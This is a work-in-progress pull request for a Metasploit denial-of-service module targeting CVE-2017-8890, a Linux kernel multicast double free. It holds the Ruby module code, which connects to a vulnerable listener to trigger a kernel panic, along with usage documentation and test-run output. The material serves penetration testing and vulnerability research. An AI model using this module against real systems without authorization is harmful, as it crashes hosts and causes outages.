### PR TITLE
[WIP] DoS module CVE 2017-8890

### DIFF
--- a/documentation/modules/auxiliary/dos/linux/mcast_dfree.md
+++ b/documentation/modules/auxiliary/dos/linux/mcast_dfree.md
@@ -1,0 +1,134 @@
+## Vulnerable Machine
+
+    1. Target is a Linux machine of kernel version 4.11 or below.
+    2. Target is listening for a connection and calls accept(). Listener socket must be in the multicast group.
+       Here's a sample of #2 written in C:
+       ```
+       sockfd = socket(AF_INET, ...);
+       setsockopt(sockfd, SOL_IP, MCAST_JOIN_GROUP, ...);
+       bind(sockfd, ...);
+       listen(sockfd, ...)
+       newsockfd = accept(sockfd, ...);
+       close(newsockfd);  // first free
+       close(sockfd);     // second free
+       ```
+    3. Target can be reached over the network.
+
+## Verification Steps
+
+    1. Start `msfconsole`
+    2. Do: `use auxiliary/dos/linux/mcast_dfree`
+    3. Do: `set RHOSTS <listener socket address>`
+    4. Do: `set RPORT <listener port>`
+    5. Do: `set WAIT_DOS <seconds to wait for DoS>`
+    6. Do: `run`
+    7. Module will ping and attempt to connect to the vulnerable target machine.
+
+## Options
+
+* `WAIT_DOS`: Integer value represents amount of seconds to sleep the module before attempting to ping after the connection to the target. The default is 15. The time from double free to kernel panic may vary depending on kernel version and other factors.
+
+## Scenarios
+
+This IPv4 double-free vulnerability (CVE 2017-8890, part of "Phoenix Talon" class of vulnerabilities) exists in kernel versions 4.11 and below. This module has been tested with the target machine running each of the following CVE 2017-8890-vulnerable kernels:
+* Linux Kernel Version 4.10.0-041000rc5-generic
+* Linux Kernel Version 4.10.15-041015-generic
+* Linux Kernel Version 4.10.17-041016-generic
+* Linux Kernel Version 4.11.0-041100-generic
+
+The above four kernels yield the following behavior from this module:
+```
+msf5 > use auxiliary/dos/linux/mcast_dfree
+msf5 auxiliary(dos/linux/mcast_dfree) > show options
+
+Module options (auxiliary/dos/linux/mcast_dfree):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   RHOSTS    127.0.0.1        yes       The target address range or CIDR identifier
+   RPORT     4444             yes       The target port (TCP)
+   WAIT_DOS  15               yes       Time to wait for target kernel to panic (in seconds)
+
+msf5 auxiliary(dos/linux/mcast_dfree) > set RHOSTS 192.168.56.101
+RHOSTS => 192.168.56.101
+msf5 auxiliary(dos/linux/mcast_dfree) > set RPORT 6666
+RPORT => 6666
+msf5 auxiliary(dos/linux/mcast_dfree) > set WAIT_DOS 35
+WAIT_DOS => 35
+msf5 auxiliary(dos/linux/mcast_dfree) > run
+[*] Running module against 192.168.56.101
+
+[*] 192.168.56.101:6666 - Pinging the target machine at 192.168.56.101
+[+] 192.168.56.101:6666 - Target machine is running.
+[+] 192.168.56.101:6666 - Connection successfuly established with 192.168.56.101:6666
+[*] 192.168.56.101:6666 - Waiting for 35 seconds...
+[*] 192.168.56.101:6666 - Pinging the target machine at 192.168.56.101
+[+] 192.168.56.101:6666 - No reply from target machine post-connection.
+[*] Auxiliary module execution completed
+```
+
+Note: As mentioned above, the `WAIT_DOS` value may need to be increased in order for the module to catch that the DoS succeeded. For instance, with a target running kernel version 4.10.17, this was necessary:
+```
+msf5 > use auxiliary/dos/linux/mcast_dfree
+msf5 auxiliary(dos/linux/mcast_dfree) > show options
+
+Module options (auxiliary/dos/linux/mcast_dfree):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   RHOSTS    127.0.0.1        yes       The target address range or CIDR identifier
+   RPORT     4444             yes       The target port (TCP)
+   WAIT_DOS  15               yes       Time to wait for target kernel to panic (in seconds)
+
+msf5 auxiliary(dos/linux/mcast_dfree) > set RHOSTS 192.168.56.101
+RHOSTS => 192.168.56.101
+msf5 auxiliary(dos/linux/mcast_dfree) > set RPORT 6666
+RPORT => 6666
+msf5 auxiliary(dos/linux/mcast_dfree) > run
+[*] Running module against 192.168.56.101
+
+[*] 192.168.56.101:6666 - Pinging the target machine at 192.168.56.101
+[+] 192.168.56.101:6666 - Target machine is running.
+[+] 192.168.56.101:6666 - Connection successfuly established with 192.168.56.101:6666
+[*] 192.168.56.101:6666 - Waiting for 15 seconds...
+[*] 192.168.56.101:6666 - Pinging the target machine at 192.168.56.101
+[-] 192.168.56.101:6666 - Target machine responsive. DoS failed.
+[*] Auxiliary module execution completed
+msf5 auxiliary(dos/linux/mcast_dfree) > set WAIT_DOS 35
+WAIT_DOS => 35
+msf5 auxiliary(dos/linux/mcast_dfree) > run
+[*] Running module against 192.168.56.101
+
+[*] 192.168.56.101:6666 - Pinging the target machine at 192.168.56.101
+[+] 192.168.56.101:6666 - Target machine is running.
+[+] 192.168.56.101:6666 - Connection successfuly established with 192.168.56.101:6666
+[*] 192.168.56.101:6666 - Waiting for 35 seconds...
+[*] 192.168.56.101:6666 - Pinging the target machine at 192.168.56.101
+[+] 192.168.56.101:6666 - No reply from target machine post-connection.
+[*] Auxiliary module execution completed
+```
+But in the other three versions tested, the default 15 seconds sufficed.
+
+This module has also been tested with known patched kernels (not vulnerable to CVE 2017-8890) such as 4.12. The behavior for a non-vulnerable target is as follows:
+```
+msf5 auxiliary(dos/linux/mcast_dfree) > run
+[*] Running module against 192.168.56.101
+
+[*] 192.168.56.101:6666 - Pinging the target machine at 192.168.56.101
+[+] 192.168.56.101:6666 - Target machine is running.
+[+] 192.168.56.101:6666 - Connection successfuly established with 192.168.56.101:6666
+[*] 192.168.56.101:6666 - Waiting for 35 seconds...
+[*] 192.168.56.101:6666 - Pinging the target machine at 192.168.56.101
+[-] 192.168.56.101:6666 - Target machine responsive. DoS failed.
+[*] Auxiliary module execution completed
+```
+If the target machine is not listening, the module will fail:
+```
+msf5 auxiliary(dos/linux/mcast_dfree) > run
+[*] Running module against 192.168.56.101
+
+[*] 192.168.56.101:6666 - Pinging the target machine at 192.168.56.101
+[+] 192.168.56.101:6666 - Target machine is running.
+[-] 192.168.56.101:6666 - Failed to connect to 192.168.56.101:6666. Connection refused. Make sure target is listening.
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/dos/linux/mcast_dfree.rb
+++ b/modules/auxiliary/dos/linux/mcast_dfree.rb
@@ -3,18 +3,19 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'socket'
-include Socket::Constants
 
 class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
     super( update_info( info,
       'Name'           => 'Linux Multicast DoS',
       'Description'    => %q{
-	Linux kernel versions 4.10.15 and below leave an extra copy of a multicast socket object
-		at accept() time, if the MULTICAST_JOIN_GROUP option is set on the listening socket. Upon closing the connection, a double free occurs, leading to kernel panic.
+       Linux kernel versions 4.10.15 and below leave an extra copy of a multicast socket object
+       at accept() time, if the MULTICAST_JOIN_GROUP option is set on the listening socket.
+       Upon closing the connection, a double free occurs, leading to kernel panic.
 
-	The target system must be of kernel version less than or equal to 4.10.15.
+       The target system must be of kernel version less than or equal to 4.10.15.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -30,51 +31,68 @@ class MetasploitModule < Msf::Auxiliary
           ['CVE', '2017-8890'],
           ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-8890'],
           ['URL', 'https://www.rapid7.com/db/vulnerabilities/debian-cve-2017-8890'],
-          ['URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/ipv4/inet_connection_sock.c?h=v4.10#n668']
+          ['URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/ipv4/inet_connection_sock.c?h=v4.10#n668'],
           ['URL', 'https://thinkycx.me/posts/2018-10-30-a-glance-at-CVE-2017-8890.html'],
           ['URL', 'https://github.com/torvalds/linux/commit/657831ffc38e30092a2d5f03d385d710eb88b09a']
         ]
       ))
+
+      register_options(
+            [
+              Opt::RHOST("127.0.0.1"),
+              Opt::RPORT(4444),
+              OptInt.new('WAIT_DOS', [true, 'Time to wait for target kernel to panic (in seconds)', 15])
+            ]
+      )
   end
 
   # Simply ping the target machine
   def ping_exec(addr, port, status)
-    print_status("Pinging the target machine.")
-    reply = `ping -c 1 #{addr} -p #{port}` # Ping runs only once
-    if reply.include? "1 packets transmitted, 1 received"
+    print_status("Pinging the target machine at #{addr}")
+    reply = `ping -c 1 #{addr}` # Ping runs only once
+    if (reply.include? "1 packets transmitted, 1 received") && (status == "pre-connect")
       print_good("Target machine is running.")
-    elsif status == "pre-connect"
-      print_error("Error: ping received no reply from target machine.")
-    else
+    elsif (reply.include? "1 packets transmitted, 1 received") && (status == "post-connect")
+      print_error("Target machine responsive. DoS failed.")
+      return
+    elsif status == "post-connect"
       print_good("No reply from target machine post-connection.")
+    else
+      print_error("No reply from target machine. Make sure it is reachable.")
+      return
     end
   end
-    
+
   def run
     addr = datastore['RHOST']
     port = datastore['RPORT']
 
     ping_exec(addr, port, "pre-connect")
 
-    # Prepare the client socket
-    client_socket = Socket.new(AF_INET, SOCK_STREAM, 0)
-    serveraddr = Socket.sockaddr_in(port, addr) # Server address and port
-    clientaddr = Socket.sockaddr_in(0, '') # Client addr is => INADDR_ANY
-    client_socket.bind(clientaddr) # Bind client address
-    ret = client_socket.connect(serveraddr) # Connect to server
-    if ret == 0
+    begin
+      connect	 # Connect using TCP mixin
       print_good("Connection successfuly established with #{addr}:#{port}")
-    else
-      print_error("Failed to connect to #{addr}:#{port}")
+      disconnect # Disconnect right away since kernel panic already triggered
+    rescue Rex::ConnectionRefused
+      print_error("Failed to connect to #{addr}:#{port}. Connection refused. Make sure target is listening.")
+      return
+    rescue Rex::HostUnreachable
+      print_error("Failed to connect to #{addr}:#{port}. Host unreachable.")
+      return
+    rescue Rex::AddressInUse
+      print_error("Failed to connect to #{addr}:#{port}. Address in use.")
+      return
+    rescue ::Errno::ETIMEDOUT
+      print_error("Failed to connect to #{addr}:#{port}. Timeout time exceeded.")
+      return
+    rescue Rex::ConnectionTimeout
+      print_error("Failed to connect to #{addr}:#{port}. The connection timed out.")
+      return
     end
 
-    client_socket.close
-    
-    # TODO: Figure out how to properly sleep
-    #print_status("Waiting for 10 seconds...")
-    #Rex.sleep(10)
+    print_status("Waiting for #{datastore['WAIT_DOS']} seconds...")
+    Rex.sleep(datastore['WAIT_DOS'])
 
     ping_exec(addr, port, "post-connect") # No reply if kernel panicked
-    	
   end
 end

--- a/modules/auxiliary/dos/linux/mcast_dfree.rb
+++ b/modules/auxiliary/dos/linux/mcast_dfree.rb
@@ -6,6 +6,7 @@ require 'socket'
 
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::Tcp
+  #include Msf::Exploit::Remote::Ipv6
 
   def initialize(info = {})
     super( update_info( info,
@@ -29,8 +30,6 @@ class MetasploitModule < Msf::Auxiliary
         [
           ['BID', '98562'],
           ['CVE', '2017-8890'],
-          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-8890'],
-          ['URL', 'https://www.rapid7.com/db/vulnerabilities/debian-cve-2017-8890'],
           ['URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/ipv4/inet_connection_sock.c?h=v4.10#n668'],
           ['URL', 'https://thinkycx.me/posts/2018-10-30-a-glance-at-CVE-2017-8890.html'],
           ['URL', 'https://github.com/torvalds/linux/commit/657831ffc38e30092a2d5f03d385d710eb88b09a']
@@ -47,52 +46,51 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   # Simply ping the target machine
-  def ping_exec(addr, port, status)
+  def ping_exec(addr, status)
     print_status("Pinging the target machine at #{addr}")
     reply = `ping -c 1 #{addr}` # Ping runs only once
-    if (reply.include? "1 packets transmitted, 1 received") && (status == "pre-connect")
-      print_good("Target machine is running.")
-    elsif (reply.include? "1 packets transmitted, 1 received") && (status == "post-connect")
-      print_error("Target machine responsive. DoS failed.")
+    if (reply.include? '1 packets transmitted, 1 received') && (status == 'pre-connect')
+      print_good('Target machine is running.')
+    elsif (reply.include? '1 packets transmitted, 1 received') && (status == 'post-connect')
+      print_error('Target machine responsive. DoS failed.')
       return
-    elsif status == "post-connect"
-      print_good("No reply from target machine post-connection.")
+    elsif status == 'post-connect'
+      print_good('No reply from target machine post-connection.')
     else
-      print_error("No reply from target machine. Make sure it is reachable.")
+      print_error('No reply from target machine. Make sure it is reachable.')
       return
     end
   end
 
   def run
-    addr = datastore['RHOST']
-    port = datastore['RPORT']
-
-    ping_exec(addr, port, "pre-connect")
+    ping_exec(rhost, 'pre-connect')
+    #ping6(datastore['SHOST']) # built-in IPV6 ping function
 
     begin
       connect	 # Connect using TCP mixin
-      print_good("Connection successfuly established with #{addr}:#{port}")
+      print_good("Connection successfuly established with #{rhost}:#{rport}")
       disconnect # Disconnect right away since kernel panic already triggered
     rescue Rex::ConnectionRefused
-      print_error("Failed to connect to #{addr}:#{port}. Connection refused. Make sure target is listening.")
+      print_error("Failed to connect to #{rhost}:#{rport}. Connection refused. Make sure target is listening.")
       return
     rescue Rex::HostUnreachable
-      print_error("Failed to connect to #{addr}:#{port}. Host unreachable.")
+      print_error("Failed to connect to #{rhost}:#{rport}. Host unreachable.")
       return
     rescue Rex::AddressInUse
-      print_error("Failed to connect to #{addr}:#{port}. Address in use.")
+      print_error("Failed to connect to #{rhost}:#{rport}. Address in use.")
       return
     rescue ::Errno::ETIMEDOUT
-      print_error("Failed to connect to #{addr}:#{port}. Timeout time exceeded.")
+      print_error("Failed to connect to #{rhost}:#{rport}. Timeout time exceeded.")
       return
     rescue Rex::ConnectionTimeout
-      print_error("Failed to connect to #{addr}:#{port}. The connection timed out.")
+      print_error("Failed to connect to #{rhost}:#{rport}. The connection timed out.")
       return
     end
 
     print_status("Waiting for #{datastore['WAIT_DOS']} seconds...")
     Rex.sleep(datastore['WAIT_DOS'])
 
-    ping_exec(addr, port, "post-connect") # No reply if kernel panicked
+    ping_exec(rhost, 'post-connect') # No reply if kernel panicked
+    #ping6(datastore['SHOST']) # built-in IPV6 ping function
   end
 end

--- a/modules/auxiliary/dos/linux/mcast_dfree.rb
+++ b/modules/auxiliary/dos/linux/mcast_dfree.rb
@@ -1,0 +1,80 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'socket'
+include Socket::Constants
+
+class MetasploitModule < Msf::Auxiliary
+
+  def initialize(info = {})
+    super( update_info( info,
+      'Name'           => 'Linux Multicast DoS',
+      'Description'    => %q{
+	Linux kernel versions 4.10.15 and below leave an extra copy of a multicast socket object
+		at accept() time, if the MULTICAST_JOIN_GROUP option is set on the listening socket. Upon closing the connection, a double free occurs, leading to kernel panic.
+
+	The target system must be of kernel version less than or equal to 4.10.15.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          '<syzkaller>', # Google's kernel fuzzer found this vulnerability
+          '7043mcgeep <patrick.j.mcgee@marquette.edu>' # MSF module
+        ],
+      'Platform'       => ['linux'],
+      'DisclosureDate' => '2017-05-10',
+      'References'     =>
+        [
+          ['BID', '98562'],
+          ['CVE', '2017-8890'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-8890'],
+          ['URL', 'https://www.rapid7.com/db/vulnerabilities/debian-cve-2017-8890'],
+          ['URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/ipv4/inet_connection_sock.c?h=v4.10#n668']
+          ['URL', 'https://thinkycx.me/posts/2018-10-30-a-glance-at-CVE-2017-8890.html'],
+          ['URL', 'https://github.com/torvalds/linux/commit/657831ffc38e30092a2d5f03d385d710eb88b09a']
+        ]
+      ))
+  end
+
+  # Simply ping the target machine
+  def ping_exec(addr, port, status)
+    print_status("Pinging the target machine.")
+    reply = `ping -c 1 #{addr} -p #{port}` # Ping runs only once
+    if reply.include? "1 packets transmitted, 1 received"
+      print_good("Target machine is running.")
+    elsif status == "pre-connect"
+      print_error("Error: ping received no reply from target machine.")
+    else
+      print_good("No reply from target machine post-connection.")
+    end
+  end
+    
+  def run
+    addr = datastore['RHOST']
+    port = datastore['RPORT']
+
+    ping_exec(addr, port, "pre-connect")
+
+    # Prepare the client socket
+    client_socket = Socket.new(AF_INET, SOCK_STREAM, 0)
+    serveraddr = Socket.sockaddr_in(port, addr) # Server address and port
+    clientaddr = Socket.sockaddr_in(0, '') # Client addr is => INADDR_ANY
+    client_socket.bind(clientaddr) # Bind client address
+    ret = client_socket.connect(serveraddr) # Connect to server
+    if ret == 0
+      print_good("Connection successfuly established with #{addr}:#{port}")
+    else
+      print_error("Failed to connect to #{addr}:#{port}")
+    end
+
+    client_socket.close
+    
+    # TODO: Figure out how to properly sleep
+    #print_status("Waiting for 10 seconds...")
+    #Rex.sleep(10)
+
+    ping_exec(addr, port, "post-connect") # No reply if kernel panicked
+    	
+  end
+end


### PR DESCRIPTION
## WIP Pull Request
This is my first module. I have uncertainties with it. Nonetheless, I wanted to open this PR as a work-in-progress as I need help getting some things squared away before I'm set on this implementation.

I want to preface this by saying, I have tested this DoS in plain-ole Ruby and it works. All it does is make a connection to an assumed-vulnerable listener. Right now, my troubles come with a lack of knowledge about the framework's loading of modules. I need to know how to run it in MSF, then I can think more about the actual DoS module.

Here's a list of the things I'm having trouble with. The first few things have to do with my lack of understanding of the framework:

1. Literally running the new module in `msfconsole`. After following [this guide from the wiki](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-auxiliary-module), among others, I thought, "Great, all I have to do is drop a new Ruby file in there and get started". This doesn't seem to be the case since `msfconsole` can't find it (it doesn't come up using the `search` command). Is there some sort of master module registry that one needs to update before expecting a new Ruby file contained in `modules/` to be loaded by the framework?
2. Following up question 1, going into this, I thought all that was necessary is to add the fully-functional and tested module, and corresponding documentation (2 file additions). Does anything else have to be added/changed?
3. When the `show options` command is executed with this module selected, and it gives output of required options for the module, where are those defined? For instance, I only need RHOST (listener IP) and RPORT (listener port). I assume this has something to do with the class inheritance of the module.
4. My inclusion of Ruby's `socket` and `Socket::Constants` libraries. Are there other socket libraries I must use instead? Just trying to set up a client socket and connect to a listener (which the module assumes is already listening).
5.  Line 75. I want to wait a few seconds before pinging again, since the kernel panic takes a few seconds (which I found through my testing). Is there a proper way to put a module to sleep for a few seconds?
6. Do I need to use any mixins for what I'm trying to do?
7. I made a new directory for this module, which makes sense to me since it seems this is the first linux kernel DoS module. Is that OK?
8. The DoS concept of this module is questionable. In its current state, this module (should) simply connect to a listening target, then ping it to see if it's still alive. It assumes the target is already running a socket listener that has been created with the `MCAST_JOIN_GROUP` option. I have tested this in C. But honestly, I don't like this assumption, since it's a pretty specific set of instructions that must be running on the target. That said, does it make more sense to have this somewhat specific listener code be a payload generated by `venom`, then the executable may be dropped onto the target machine and executed manually? Then this module can connect and DoS.

Suggestions and criticisms are appreciated.

## Module: Phoenix Talon CVE 2017-8890

This may resolve issue [#8571](https://github.com/rapid7/metasploit-framework/issues/8571), which requests Phoenix Talon modules.

## Overview of 2017-8890

[This CVE:](https://nvd.nist.gov/vuln/detail/CVE-2017-8890)
- is the most serious member of the Phoenix Talon class of Linux kernel vulnerabilities. No POC of this CVE exists in the [Exploit DB](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true). But other public POC's are available.
- is not very well-documented. But here's a [short explanation](https://2freeman.github.io/2018/01/06/CVE-2017-8890-internals.html) to give you a general understanding of the vulnerability.
- exists in all kernel versions through 4.10.15, although some sources say it exists through 4.11. [See the patch commit here](https://github.com/torvalds/linux/commit/657831ffc38e30092a2d5f03d385d710eb88b09a).
- is the result of a flaw in the kernel's IPv4 stack (specifically, multicast).

On the target machine, a double-free is triggered due to the kernel keeping an extra copy of `mc_list` at `accept()` time. I have a longer explanation [in this readme](https://github.com/7043mcgeep/cve-2017-8890-msf). There, you will also find a sample C file. With this server (created with socket option MCAST_JOIN_GROUP) listening on a kernel 4.10 machine, an accepted connection causes a kernel panic. I've tested this on Ubuntu x64.
